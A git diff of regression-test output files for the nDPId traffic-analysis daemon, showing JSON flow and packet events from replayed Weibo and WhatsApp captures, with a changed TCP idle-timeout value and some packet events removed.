-00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071046,"flow_last_seen":1463089071094,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.206","src_port":35154,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071046,"flow_last_seen":1463089071094,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.206","src_port":35154,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1463089070841,"flow_last_seen":1463089071891,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":1081,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59119,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089070841,"flow_last_seen":1463089071198,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59120,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089070841,"flow_last_seen":1463089071198,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59120,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089071008,"flow_last_seen":1463089071348,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59121,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089071008,"flow_last_seen":1463089071348,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59121,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071046,"flow_last_seen":1463089071094,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.206","src_port":35154,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071046,"flow_last_seen":1463089071094,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.206","src_port":35154,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1463089070755,"flow_last_seen":1463089072356,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":391,"flow_tot_l4_payload_len":1586,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.227","src_port":53656,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}} 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1463089070755,"flow_last_seen":1463089072356,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":391,"flow_tot_l4_payload_len":1586,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.227","src_port":53656,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073479,"flow_last_seen":1463089073479,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":50533,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":79,"flow_first_seen":1463089071613,"flow_last_seen":1463089072438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2872,"flow_tot_l4_payload_len":31898,"flow_avg_l4_payload_len":403,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":79,"flow_first_seen":1463089071613,"flow_last_seen":1463089072438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2872,"flow_tot_l4_payload_len":31898,"flow_avg_l4_payload_len":403,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} 00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073760,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":50640,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073394,"flow_last_seen":1463089073394,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":11798,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","packets-captured":498,"packets-processed":498,"total-skipped-flows":0,"total-l4-data-len":234875,"total-not-detected-flows":0,"total-guessed-flows":21,"total-detected-flows":23,"total-detection-updates":11,"total-updates":0,"current-active-flows":0,"total-active-flows":44,"total-idle-flows":44,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":239,"global_ts_msec":1463089073893} diff --git a/test/results/whatsapp_login_call.pcap.out b/test/results/whatsapp_login_call.pcap.out index b83ed74a6..ea7e739c8 100644 --- a/test/results/whatsapp_login_call.pcap.out +++ b/test/results/whatsapp_login_call.pcap.out 
@@ -1,45 +1,45 @@ 00470{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1432582222253} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582222253,"flow_last_seen":1432582222253,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582222253,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.70","src_port":49199,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1432582222253,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582222253,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA0DNdAAEAG9U7AqAIEEaxkRsAvA+GIPSCcUlOPyIAQH\/poTQAAAQEICi36Gt0QlQ1l"} -00711{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1432582222267,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":236,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":236,"pkt_l4_len":202,"thread_ts_msec":1432582222267,"pkt":"xiwDYGpkAPS5Jrv0CABFAADeU1tAAEAGriDAqAIEEaxkRsAvA+GIPSCcUlOPyIAYIAB\/kgAAAQEICi36GusQlQ1lFwMBACCNqYpymgjJuQNgLA+QJekfsmHWqykdlwnJ8t48lRIpCxcDAQCAv+6eyOO6KHhFdGRnKCRyPqihrwnYLrpV5EXpUrXv8Q2ow7fiZ\/ErfHE9ZAprbeZEb1cjDczzZ9GWtg7wUDK1rjYT+gKbhCMZiNQZ3QlWly2tQPPw5M7rqWdzOWy2ATMXqxCkXOBCTdOBYD70ikDCSIjo2fZ8\/cJDhiGvSnc\/9Rw="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1432582222410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582222410,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0e5UAAC8G15ARrGRGwKgCBAPhwC9SU4\/IiD0hRoAQAJuGIAAAAQEIChCVDjkt+hrr"} 
-00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582223075,"flow_last_seen":1432582223075,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582223075,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.154.66.121","src_port":49166,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1432582223075,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582223075,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoimtAAEAGmaXAqAIEEZpCecAOAbvaSAv6foHOKFARQABkXQAA"} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582223077,"flow_last_seen":1432582223077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582223077,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.154.66.111","src_port":49163,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1432582223077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582223077,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAowYpAAEAGYpDAqAIEEZpCb8ALAbvQPf\/UHJzPWVARQADbTgAA"} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1432582223271,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582223271,"pkt":"APS5Jrv0xiwDYGpkCABFAAAo1rsAAPAG3V4RmkJvwKgCBAG7wAscnM9Z0D3\/1VARCf8RTwAA"} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1432582223276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582223276,"pkt":"APS5Jrv0xiwDYGpkCABFAAAos7EAAPAGAF8RmkJ5wKgCBAG7wA5+gc4o2kgL+1ARCf+aXQAA"} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1432582223379,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582223379,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoD6pAAEAGFHHAqAIEEZpCb8ALAbvQPf\/VHJzPWlAQQADbTQAA"} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1432582223379,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582223379,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAo\/GpAAEAGJ6bAqAIEEZpCecAOAbvaSAv7foHOKVAQQABkXAAA"} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582224208,"flow_last_seen":1432582224208,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582224208,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49169,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1432582224208,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582224208,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoKQFAAEAG+w\/AqAIEEa1CZsARAbueE\/YokxpP+1ARQAAf9QAA"} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582224210,"flow_last_seen":1432582224210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582224210,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.186.135.82","src_port":49173,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1432582224210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582224210,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA05xtAAEAGq+\/AqAIEXbqHUsAVAFCuhm774V0pFoARIEWaRQAAAQEICi36IndY+IKz"} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582224230,"flow_last_seen":1432582224230,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582224230,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"23.50.148.228","src_port":49172,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1432582224230,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582224230,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA05uBAAEAG5SDAqAIEFzKU5MAUAbtLz6It0ZnyqIARIAAW8QAAAQEICi36IooRXfsX"} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582224235,"flow_last_seen":1432582224235,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582224235,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"5.178.42.26","src_port":49174,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1432582224235,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582224235,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA0IU9AAEAGJv3AqAIEBbIqGsAWAFB5Ls3ledN1n4ARIFCQkQAAAQEICi36Io9kkidZ"} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1432582224238,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582224238,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0pWwAADkGNJ9duodSwKgCBABQwBXhXSkWroZu\/IARAeZAKgAAAQEIClj4+ywt+iJ3"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1432582224240,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582224240,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA06DdAAEAGqtPAqAIEXbqHUsAVAFCuhm784V0pF4AQIEUhrwAAAQEICi36IpNY+Pss"} -00596{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1432582224258,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":151,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":151,"pkt_l4_len":117,"thread_ts_msec":1432582224258,"pkt":"APS5Jrv0xiwDYGpkCABFAACJJDcAADkG7nUXMpTkwKgCBAG7wBTRmfKoS8+iLoAYAghwjQAAAQEIChFecist+iKKFQMDAFAv7dNuXnOpK1CdvNYEt52MdeH58dywqIMfN+GfFSQKoHdGcEPHPIYnDd6I8bRCtU0lSoikjPCdTCArNmgRywMWXqpqGQcfgITTy3erXmajWw=="} 
-00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1432582224259,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582224259,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0JDgAADkG7skXMpTkwKgCBAG7wBTRmfL9S8+iLoARAgi9fgAAAQEIChFecist+iKK"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1432582224263,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582224263,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0UnIAADkGPNoFsioawKgCBABQwBZ503WfeS7N5oARAeY3ugAAAQEICmSSnpkt+iKP"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1432582224264,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582224264,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA0QQVAAEAGB0fAqAIEBbIqGsAWAFB5Ls3medN1oIAQIFAZNgAAAQEICi36Iqlkkp6Z"} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1432582224347,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582224347,"pkt":"APS5Jrv0xiwDYGpkCABFAAAopJIAAO4GEX4RrUJmwKgCBAG7wBGTGk\/7nhP2KVARCf9V9QAA"} 
